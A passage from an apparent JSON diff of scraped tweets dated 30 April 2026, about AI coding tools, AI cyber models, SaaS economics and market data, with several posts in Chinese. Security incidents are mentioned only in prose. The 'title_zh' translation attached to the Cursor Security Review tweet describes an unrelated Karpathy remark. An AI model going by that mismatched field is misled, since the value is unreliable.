"2026-04-30T20:47:59+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Multi-year contracts don't matter. \n\n\"Deferred churn is still churn, it just shows up later.\n\nLong contracts do not mean customers are loyal, they just delay the moment they leave.\n\nIf a better solution comes along, they will switch when the contract ends.\" @jasonlk\n\nDoes getting customers on multi-year contracts even matter anymore @Bouazizalex @matanSF @adamguild @michaelpwalrath", + "url": "https://x.com/HarryStebbings/status/2049951674891203065", + "published_at": "2026-04-30T20:39:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Amazon revenues increased 17% over the last year to a new Q1 record of $182 billion. Net Income increased 77% YoY to $30 billion, the highest quarterly profit in company history. Operating margins increased to a record 13.4% from 12.0% a year ago. $AMZN", + "url": "https://x.com/charliebilello/status/2049950680236827140", + "published_at": "2026-04-30T20:35:03+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "big upgrade for codex today!\n\ntry it for non-coding computer work.", + "url": "https://x.com/sama/status/2049946120441520624", + "published_at": "2026-04-30T20:16:55+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "it does seem cool", + "url": "https://x.com/sama/status/2049944981750833659", + "published_at": "2026-04-30T20:12:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Computer Use runs this use case 42% faster in today's Codex app update.", + "url": "https://x.com/sama/status/2049932746567598472", + "published_at": "2026-04-30T19:23:47+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: It's never been easier to do everyday work with Codex.\n\nChoose your role, connect the apps you use every day, and try suggested prompts.\n\nCodex helps with everything from research and planning to docs, slides, spreadsheets, and more.", + "url": "https://x.com/sama/status/2049928776147230886", + "published_at": "2026-04-30T19:08:00+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We’re continuing to improve the runtime, harness, and models powering Cursor Security Review for a strong out-of-the-box experience.\n\nSecurity agents draw from your existing usage pool. \n\nLearn more: http://cursor.com/docs/security-review", + "url": "https://x.com/cursor_ai/status/2049926287439929475", + "published_at": "2026-04-30T18:58:07+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Customize these Cursor-managed security agents to match your team’s requirements.\n\nAdjust triggers, add your own instructions, give them custom tooling, and choose how outputs are shared.", + "url": "https://x.com/cursor_ai/status/2049926285518848093", + "published_at": "2026-04-30T18:58:06+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Cursor Security Review is now available for Teams and Enterprise plans.\n\nRun two types of always-on agents:\n1. Security Reviewer checks every PR for vulnerabilities and leaves comments.\n2. Vulnerability Scanner runs scheduled scans of your codebase and posts findings in Slack.", + "url": "https://x.com/cursor_ai/status/2049926283061035254", + "published_at": "2026-04-30T18:58:06+00:00", + "source": "nitter", + "title_zh": "Andrej Karpathy指出AI编程进入3.0时代,开发者从写代码转向任务描述,神经网络将成为计算核心架构" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "还得是投行的女高管,操控股价有水平的", + "url": "https://x.com/realNyarime/status/2049924132037693573", + "published_at": "2026-04-30T18:49:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "R to @Svwang1: 李克用在 884年消灭黄巢的战斗中起到决定性作用,但在回师路上的“上元驿之变”中差点被朱温暗算杀害。", + "url": "https://x.com/svwang1/status/2049922524839018604", + "published_at": "2026-04-30T18:43:10+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "按照这个研究,李克用的基因大概 53%来自东北亚,47% 来自西亚到欧洲的大草原 (western steppe). 按照Ai 的说法,后者的基因主要在芬兰人和瑞典人中居多。\n\n李克用的儿子李存勖 (后唐庄宗)的子嗣,在 926年的兴教门之变后都被杀光,所以估计现在还带着他的基因的,是李存勖的兄弟的后代。", + "url": "https://x.com/svwang1/status/2049920960724427165", + "published_at": "2026-04-30T18:36:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Co-sign.", + "url": "https://x.com/DavidSacks/status/2049920259432513702", + "published_at": "2026-04-30T18:34:10+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Gas prices in California have moved up above $6.00/gallon, 40% higher than the US national average ($4.30/gallon).", + "url": "https://x.com/charliebilello/status/2049920236002963504", + "published_at": "2026-04-30T18:34:04+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://x.com/eladgil/status/2049919569134047726", + "published_at": "2026-04-30T18:31:25+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The S&P 500 just crossed above 7,200 for the first time. A year ago it was at 5,600. 5 years ago it was at 4,200. 10 years ago it was at 2,100. $SPX", + "url": "https://x.com/charliebilello/status/2049913908861792603", + "published_at": "2026-04-30T18:08:56+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: John Oliver @LastWeekTonight slays a pile of greedy tech CEOs, gives props to @GaryMarcus 😻\n\nThe tides are changing, and other folks like @wendyweeww are speaking out in support.", + "url": "https://x.com/GaryMarcus/status/2049909103129251864", + "published_at": "2026-04-30T17:49:50+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Your honour, I think this should be allowed.", + "url": "https://x.com/eladgil/status/2049908719782334528", + "published_at": "2026-04-30T17:48:18+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "It’s time to demystify Mythos. \n\nMythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). \n\nOpenAI’s GPT-5.5-cyber can now do the same. And all the frontier models (including those from China) will be there within approximately 6 months. \n\nIt’s important to recognize that these models do not create vulnerabilities; they discover them. The bugs are already in the code. Using AI to discover and patch them will actually harden these systems.\n\nThe leap from pre-AI cyber to post-AI cyber means that there will be a big upgrade cycle. After that, however, the market is likely to reach a new equilibrium between AI-powered cyber-offense and AI-powered cyber-defense. \n\nObviously it’s important that cyber defenders get access before cyber attackers. That process is already underway but needs to happen quickly (see point above about Chinese models). \n\nUnlike Mythos, GPT-5.5-cyber appears not to be token constrained so it may be the first cyber model that defenders actually get to use.", + "url": "https://x.com/DavidSacks/status/2049907993588769006", + "published_at": "2026-04-30T17:45:25+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "This is the the quote I've been citing a lot recently.", + "url": "https://x.com/karpathy/status/2049907410303865030", + "published_at": "2026-04-30T17:43:06+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: The best hedge fund PMs compare views from different research analysts. Now you can do that in 2 minutes with Equity Research Council in Perplexity Computer.\n\nThis workflow pulls in research from brokers like GS, JPM, MS, and Evercore - and shows you where they agree vs. disagree.", + "url": "https://x.com/AravSrinivas/status/2049907277646160333", + "published_at": "2026-04-30T17:42:35+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "What the public markets are getting wrong about the SaaS-pocalypse\n\n\"The public markets are directionally right, but missing the real shift.\n\nThe threat is not AI tools themselves, it is the agents deciding what tools to use.\n\nWinners will be the companies' agents choose to integrate with, not the ones humans prefer to use.\" @jasonlk\n\nLove to hear your thoughts on this @mcannonbrookes @zoink @levie @AnjneyMidha @dharmesh @rory_builds", + "url": "https://x.com/HarryStebbings/status/2049905369963745470", + "published_at": "2026-04-30T17:35:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "lisan say more mean things about us you're being too nice", + "url": "https://x.com/sama/status/2049903925311267311", + "published_at": "2026-04-30T17:29:15+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "Fireside chat at Sequoia Ascent 2026 from a ~week ago. Some highlights:\n\nThe first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding). Three examples of new horizons:\n\n1. menugen: an app that can be fully engulfed by LLMs, with no classical code needed: input an image, output an image and an LLM can natively do the thing.\n2. install .md skills instead of install .sh scripts. Why create a complex Software 1.0 bash script for e.g. installing a piece of software if you can write the installation out in words and say \"just show this to your LLM\". The LLM is an advanced interpreter of English and can intelligently target installation to your setup, debug everything inline, etc.\n3. LLM knowledge bases as an example of something that was *impossible* with classical code because it's computation over unstructured data (knowledge) from arbitrary sources and in arbitrary formats, including simply text articles etc.\n\nI pushed on these because in every new paradigm change, the obvious things are always in the realm of speeding up or somehow improving what existed, but here we have examples of functionality that either suddenly perhaps shouldn't even exist (1,2), or was fundamentally not possible before (3).\n\nThe second (ongoing) theme is trying to explain the pattern of jaggedness in LLMs. How it can be true that a single artifact will simultaneously 1) coherently refactor a 100,000-line code base *and* 2) tell you to walk to the car wash to wash your car. I previously wrote about the source of this as having to do with verifiability of a domain, here I expand on this as having to also do with economics because revenue/TAM dictates what the frontier labs choose to package into training data distributions during RL. You're either in the data distribution (on the rails of the RL circuits) and flying or you're off-roading in the jungle with a machete, in relative terms. Still not 100% satisfied with this, but it's an ongoing struggle to build an accurate model of LLM capabilities if you wish to practically take advantage of their power while avoiding their pitfalls, which brings me to...\n\nLast theme is the agent-native economy. The decomposition of products and services into sensors, actuators and logic (split up across all of 1.0/2.0/3.0 computing paradigms), how we can make information maximally legible to LLMs, some words on the quickly emerging agentic engineering and its skill set, related hiring practices, etc., possibly even hints/dreams of fully neural computing handling the vast majority of computation with some help from (classical) CPU coprocessors.", + "url": "https://x.com/karpathy/status/2049903821095354523", + "published_at": "2026-04-30T17:28:50+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Our agent harness makes models inside Cursor faster, smarter, and more token-efficient.\n\nHere's how we test improvements to the harness, monitor and repair degradations, and customize it for different models.\n\nhttp://cursor.com/blog/continually-improving-agent-harness", + "url": "https://x.com/cursor_ai/status/2049901436918436249", + "published_at": "2026-04-30T17:19:22+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "GPT-5.5的网络攻击能力好像比前段时间吹上天的Mythos\n\n没差这么多呀😂", + "url": "https://x.com/lxfater/status/2049896961382203667", + "published_at": "2026-04-30T17:01:35+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "这下不止中国大陆,连香港到美的互联也要玩烂了!\nFCC表决撤销中资运营商的一揽子授权之提议,目的是堵住 2022 年的法律漏洞:即使「中资运营商」的通信牌照被撤销,它们仍可根据一揽子授权(Blanket Authority)自动获得美国国内的州际电信服务资质\n\n会议中最激进的部分是关于禁止互联(Interconnection)的讨论,即讨论将从物理上禁止Verizon、AT&T等美资运营商与中资运营商的互联。如此一来,不仅电信、联通、移动、中信的美国电信业务被踢出局,还会连带IDC、IXP、PoP一同被赶这次行动会祭出「股权穿透」大招,即电信、联通、移动、中信的本体及其占股 >= 10% 的关联公司,都会因此连坐\n\n其中香港运营商PCCW和HKT都满足「股权穿透」条件,大概还有30-60天的公开征求意见期,以及可能的上诉法院司法审查。三大运营商+中信的游说团和律师团虽说要出动,但翻盘的成功率很低,因为但凡涉及national security这种包装话术,即使走到美国上诉法院,都免不了支持 FCC 提案,这毕竟符合美版《总体国家安全观》", + "url": "https://x.com/realNyarime/status/2049896651989614721", + "published_at": "2026-04-30T17:00:21+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "OpenAI 发了篇博客复盘自家模型一个挺有意思的\"口癖哥布林\"问题,\n\n从 GPT-5.1 起,他们的模型莫名其妙开始爱用 goblin、gremlin 这些怪物词打比方,越往后越泛滥。\n\nOpenAI 一路扒数据,定位到是训练 \"Nerdy\"(书呆子气)人格时,奖励信号意外地给\"用怪物词做比喻\"加了高分。\n\n具体证据:\n1. GPT-5.1 上线后,ChatGPT 里 goblin 用量涨了 175%,gremlin 涨了 52%。\n\n2. Nerdy 人格只占所有回答的 2.5%,却贡献了 66.7% 的 goblin。76.2% 的数据集里,带怪物词的回答评分都比不带的高。\n\n3. RL 不保证学到的行为只待在原始条件里。Nerdy 下生成的样本被复用进 SFT(监督微调),整个模型就跟着学过去了。\n\n4. 还不止 goblin 一族——raccoon(浣熊)、troll、ogre、pigeon 全中招,frog 倒是大部分时候是合理使用。\n\n5. OpenAI 三月退役了 Nerdy 人格、删掉这条奖励、过滤了训练数据里的怪物词。GPT-5.5 没赶上修,就在 Codex 里加了一句\"别说 goblin\"的 system prompt 兜底。", + "url": "https://x.com/Pluvio9yte/status/2049890985631768653", + "published_at": "2026-04-30T16:37:50+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "N26关门了,中港澳台全部不接受", + "url": "https://x.com/realNyarime/status/2049889887684616218", + "published_at": "2026-04-30T16:33:28+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "👀回顾来时路\n\n从这条推文开始,进行了9个月的日更推文\n\n经历了内容方向的摸索、带人X增长与知识付费和自身X增长矛盾的时期、B端业务探索\n\n算是找到了点出路\n\n离职的可以参考下,在职的也要掂量下", + "url": "https://x.com/GoSailGlobal/status/2049887802863583240", + "published_at": "2026-04-30T16:25:11+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "Pinned: How we prompt AI is very different in 2026 than 2022 when ChatGPT came out.\n\nI'm teaching a new course, AI Prompting for Everyone, to help you become an AI power user — whatever your current skill level.\n\nIt covers skills that apply across ChatGPT, Gemini, Claude, and other AI tools. How to use deep research mode for well-researched reports on complex questions. How to give AI the right context, including more documents and images than most people realize you can provide. When to ask AI to think hard for several minutes on important decisions like what car to buy, what to study, or what job to take. And how to use AI to generate images, analyze data, and build simple games and websites.\n\nI also cover intuitions about how these models work under the hood, so you know when to trust an answer and when not to.\n\nAlong the way, you'll see flying squirrels, a creativity test, some of my old family photos, and fireworks.\n\nJoin me at http://deeplearning.ai/courses/ai-prompting-for-everyone", + "url": "https://x.com/AndrewYNg/status/2049886895530967534", + "published_at": "2026-04-30T16:21:35+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "A÷你认真的吗,38分钟打满了😅", + "url": "https://x.com/Pluvio9yte/status/2049886136580137378", + "published_at": "2026-04-30T16:18:34+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Microsoft Revenues (Billions)...\n2026 (est): 354\n'25: 305\n'24: 262\n'23: 228\n'22: 203\n'21: 185\n'20: 153\n'19: 134\n'18: 118\n'17: 102\n'16: 95\n'15: 88\n'14: 93\n'13: 83\n'12: 73\n'11: 72\n'10: 67\n'09: 59\n'08: 62\n'07: 58\n'06: 46\n'05: 41\n'04: 38\n'03: 34\n'02: 31\n'01: 27\n'00: 24\n'99: 22\n$MSFT", + "url": "https://x.com/charliebilello/status/2049882175433015544", + "published_at": "2026-04-30T16:02:50+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Naval 讲了一句让我转身就去打开 Cursor 的话\n\n电子游戏给你的是假奖励真多巴胺 \n\nvibe coding 给你的是真奖励真多巴胺\n\n游戏让你卡在能力边缘,但世界是别人造的,迟早通关 \n\nvibe coding 底下跑的是图灵机,无界,目标自己定,做出来的东西是真的\n\n他一批朋友因此\"消失了\",钻进去做自己想了很多年的那个 app \n\n他自己也在一个人重做 Airchat\n\n而最难的不是写代码,是知道你要什么", + "url": "https://x.com/GoSailGlobal/status/2049881966850499058", + "published_at": "2026-04-30T16:02:00+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Mitchell(Vagrant、Terraform、Ghosty 的作者)今天宣布离开 GitHub \n\nGitHub 第 1299 号用户,注册 18 年,几乎没断过一天 \n\n他说写完离别帖,眼泪滴到了键盘上\n\n不是矫情,是 GitHub 真的快不能用了\n\n最近两周连续翻车 \n\n1️⃣ 4 月 23 日 merge queue 出 bug,2800 多个 PR 被静默撤回,已经合进主干的代码凭空消失 \n\n2️⃣ 拉取请求 API 整整一个工作日打不开 \n\n3️⃣ 一个 RCE 漏洞,黑客一个 git push -O 就能访问上百万仓库 TanStack 包名被恶意抢注,NPM 拖了几年没处理,那个抢注包昨天被植入恶意代码,专偷 .env\n\n技术平台的信任有 4 层 \n(1)功能跟昨天一致吗 - 早就在崩 \n(2)现在能用吗 - 一半时间不能 \n(3)昨天合并的代码还在吗 - 这条线最近被跨过去了 \n(4)别人能偷走我的代码吗 - 这条也跨了 \n\nGitHub 一层一层全丢了\n\n最荒诞的部分在管理层 GitHub 现在没有 CEO \n\nCOO 和 CTO 直接向一个微软 Azure/AI 副总汇报 \n\n而那个副总,恰好是 Atlassian 董事会成员 (Atlassian 名下那个产品叫 Bitbucket)\n\n有没有更好的替代品,是这一个真的不能用了\n\nGitLab?Forgejo?Codeberg ?Bitbucket?", + "url": "https://x.com/GoSailGlobal/status/2049881037547999546", + "published_at": "2026-04-30T15:58:18+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Google Revenues (Billions)...\n2026 (est): 476\n2025: 403\n2024: 350\n2023: 307\n2022: 283\n2021: 258\n2020: 183\n2019: 162\n2018: 137\n2017: 111\n2016: 90\n2015: 75\n2014: 66\n2013: 56\n2012: 46\n2011: 38\n2010: 29\n2009: 24\n2008: 22\n2007: 17\n2006: 11\n2005: 6.1\n2004: 3.2\n$GOOGL", + "url": "https://x.com/charliebilello/status/2049880154629878151", + "published_at": "2026-04-30T15:54:48+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "The future of product design.", + "url": "https://x.com/dingyi/status/2049875727689146789", + "published_at": "2026-04-30T15:37:12+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "所以GPT的Plus和Team额度差多少", + "url": "https://x.com/realNyarime/status/2049874226778452072", + "published_at": "2026-04-30T15:31:15+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "ChatGPT 还在让你复制粘贴的时候,Gemini 已经把活儿干完了 \n\n昨天 Google 悄悄上线了一个功能:在对话框里直接生成文件,你让他帮你写一份 budget,它是真的给你导出 \n\nExcel 支持的格式一口气拉满: PDF / Word / Excel Google Docs / Sheets / Slides LaTeX / CSV / TXT / RTF / Markdown \n\n操作只有两步: \n1)跟它说「帮我做一份 XX」 \n2)点导出 → 下载到本地或同步进 Drive \n\n意味着什么? \n\n普通用户从「问 AI」到「拿到成品」的距离,第一次被压进一个对话框里\n\n办公 AI 的最后一公里,被 Google 先抢了 全球免费已开,做出海 / AI 工具号 / 跨境内容的,下一波选题素材又有了 \n\n正在追这条线的更多动向,下一条接着拆怎么用", + "url": "https://x.com/GoSailGlobal/status/2049872749850665004", + "published_at": "2026-04-30T15:25:23+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: 本视频由seedance2生成,切勿当真!", + "url": "https://x.com/CuiMao/status/2049863222195572817", + "published_at": "2026-04-30T14:47:31+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "x.com/i/article/204974126036…", + "url": "https://x.com/GoSailGlobal/status/2049862449474740224", + "published_at": "2026-04-30T14:44:27+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "R to @realNyarime: 4月29日,据广州市天河区投资服务中心官方公众号“投资天河”发布消息,科技巨头谷歌已于28日正式签订合同,入驻位于天河CBD珠江新城的城市地标广州国际金融中心(西塔),将率先落地跨境数智赋能服务创新项目,预计今年第三季度正式投入运营。谷歌方面将联合各方优势资源,推出多项创新科技服务。\n\n据了解,谷歌将在广州天河整合全球领先的科技资源,为内地跨境电商企业提供近距离的海外精准营销、国际化品牌打造、数字化技术赋能、全球流量对接等全链条服务,谷歌依托其在全球领先的科技实力,不仅可帮助企业降低出海成本、提升运营效率,推动“中国制造”加速向“中国品牌”转型,更将在广州国际级CBD核心区——珠江新城加速一批跨境数智服务企业集聚,形成新的出海生态。", + "url": "https://x.com/realNyarime/status/2049857210659070441", + "published_at": "2026-04-30T14:23:38+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "据羊城晚报报道,谷歌落地广州,入驻位于天河 CBD 珠江新城地标广州国际金融中心(西塔)\n\n将率先落地跨境数智赋能服务创新项目,主打跨境电商业务,预计今年 Q3 正式投入运营\n谷歌方面将联合各方优势资源,推出多项国内首创科技服务", + "url": "https://x.com/realNyarime/status/2049856990957236483", + "published_at": "2026-04-30T14:22:45+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify: https://open.spotify.com/episode/2KjX2zs4ZELBidXJX9m9vK\nYoutube: https://youtu.be/aXToQKc430c\nApple Podcasts: https://podcasts.apple.com/us/podcast/20vc-anthropic-raises-%2445bn-but-falls-short-on-compute/id958230465?i=1000764648424", + "url": "https://x.com/HarryStebbings/status/2049852141334904978", + "published_at": "2026-04-30T14:03:29+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This podcast will make you smarter than Leopold Aschenbrenner at an AI investing conference.\n\n- Anthropic Raises $45BN but Falls Short on Compute\n- Are OpenAI Back in the Game with GPT5.5 & Codex?\n- Why Google is a Bigger Buy Than Ever Before\n- China Blocks Manus $2BN Deal to Meta\n- Thoma Bravo Hand Back Medallia Keys to Creditor\n\nI sat down with @rodriscoll and @jasonlk and my notes below:\n\n1. Why does Dario at Anthropic have such a hard job predicting the compute demands?\n\nThe capital intensity of building an AI leader is unprecedented; every $1 of run-rate revenue requires approximately $4 to $5 of CapEx to support it. A CEO must forecast demand two years in advance, which is incredibly risky. Underestimating demand leaves you with insufficient compute to serve users, while overestimating it results in billions of dollars in \"stranded capacity\".\n\n2. What the public markets are getting wrong about the SaaS-pocalypse\n\nThe market currently believes specific coding vibes or models are the primary threat, but the true danger is what AI agents decide to pick. Agents will ultimately choose the vendors and LLMs for most workflows, rendering tools like project management software useless because agents have no need for them. Companies like OpenAI are racing to win the \"agent wars\" to ensure their APIs are the default choice for these autonomous systems.\n\n3. Why Google is a mega-buy on the back of the Anthropic investment\n\nGoogle is positioned as a primary winner because it benefits whether users choose Gemini or Anthropic. They possess \"infinite capacity\" compared to other players, allowing them to route compute surplus between their own needs and their various customers. This massive cash flow and infrastructure flexibility make them a \"win-win-win\" in the current AI arms race.\n\n4. Multi-year contracts don't matter. Deferred churn is still churn.\n\nMulti-year contracts are often a place where \"mediocre\" management hides to mask underlying business problems. While a customer might be locked into an eight-year cycle through standard upfront terms and renewals, they are essentially just taking that time to find a better enterprise solution. If a customer eventually leaves, the churn was merely deferred, and the terminal value of the company remains impacted.\n\n5. What happens to the distributions from Manus? Do the investors have to give the money back?\n\nWhen a regulatory body like China attempts to \"unwind\" an acquisition like Meta's purchase of Manus, there is a near-zero chance that venture investors will return the capital already distributed. The real pressure point is on the acquiring corporation and the technology itself, rather than the VC funds. Such rulings are primarily designed to prevent similar deals from occurring in the future.\n\n6. The two great wars that no one is talking about\n\nTwo subtle but massive \"battles\" are currently unfolding: the US vs. China AI war and the resulting social dislocation. We are seeing a rise in \"social unrest\" expressed through billionaire taxes and penthouses taxes as layoffs from AI automation begin to impact the workforce. These themes of geopolitical competition and internal inequality will be the defining political stories of the decade.\n\n(links below)", + "url": "https://x.com/HarryStebbings/status/2049852139690754293", + "published_at": "2026-04-30T14:03:29+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "补充一点我的经历:先拿到第一单,然后作为脱敏案例,后续拿下新客户也会更容易。", + "url": "https://x.com/Pluvio9yte/status/2049845097924342258", + "published_at": "2026-04-30T13:35:30+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: x.com/i/article/204984109084…", + "url": "https://x.com/GoSailGlobal/status/2049842340056174762", + "published_at": "2026-04-30T13:24:32+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Manias, Panics, and All-Time Highs (The Week in Charts)...", + "url": "https://x.com/charliebilello/status/2049842225970852313", + "published_at": "2026-04-30T13:24:05+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "这下压力给到CAAC了,\n不过当年不予公开的原因是,可能危及国家安全、社会稳定😣", + "url": "https://x.com/realNyarime/status/2049839485610029262", + "published_at": "2026-04-30T13:13:12+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The Fed's preferred measure of inflation (Core PCE) came in at 3.2% in March, the highest level since November 2023. This was the 61st consecutive reading above the Fed's 2% target level. There will be no Fed rate cut in June and one could make a strong case for a rate hike.", + "url": "https://x.com/charliebilello/status/2049838235866566668", + "published_at": "2026-04-30T13:08:14+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Gas prices in the US have moved up to $4.30 per gallon, their highest level since July 2022. The 44% spike over the last 9 weeks ($2.98/gallon to $4.30/gallon) is the biggest we've seen in the past 30 years.", + "url": "https://x.com/charliebilello/status/2049836652181307421", + "published_at": "2026-04-30T13:01:56+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这篇文章说了很多小团队的协作经验\n\n文里提到的一些模式我也深有体会。\n\n曾经我也在工作之余兼职创业团队,也是toB,先打磨4个月,然后3个月赚了接近300万。\n\n最后也是因为超预期在分钱上出了问题。\n\n不过我没题主这么幸运,最后我一气之下离开了团队。如果在一开始就决定深入合作,找个律师过一眼合同还是挺重要的,这是我受到的教训。", + "url": "https://x.com/Pluvio9yte/status/2049836555171512759", + "published_at": "2026-04-30T13:01:33+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "孜然牛肉盖饭 4u", + "url": "https://x.com/0xAA_Science/status/2049832988452778343", + "published_at": "2026-04-30T12:47:23+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "有没有深圳的,我准备搬到深圳住,有什么需要注意的和推荐的,求告知。", + "url": "https://x.com/CuiMao/status/2049832524067794961", + "published_at": "2026-04-30T12:45:32+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "88code以前也是L站的富可敌国之一,后面因为N佬(另一位富可敌国)的PrivNode以10元出售66万债务影响,一直都没退款\n主体是北京灵伊智能科技有限公司,本质上是AI中转站,去年年底就有多名佬友反应高峰不可用、故障率高等问题,特别是挂了没有通知\n\n借雪踏乌云佬的帖提一嘴,采买第三方API服务应当多留意一下,避开这类有前科的AI中转站以免造成不必要的经济损失", + "url": "https://x.com/realNyarime/status/2049831528109326356", + "published_at": "2026-04-30T12:41:34+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "老板,我们私底下做中转站的勾当彻底被曝光了 @DarioAmodei", + "url": "https://x.com/CuiMao/status/2049828401201246395", + "published_at": "2026-04-30T12:29:09+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: A 2005 state-designed worm designed to corrupt physics simulations sat undetected on VirusTotal for nearly a decade. Fast16, intercepted executable files at the kernel level and silently rewrote floating-point calculations to make them produce slightly wrong answers. Targets: high-precision engineering suites used for structural analysis, crash simulations, and physical process modeling, including LS-DYNA, a tool cited in reports on Iran's nuclear weapons research. The 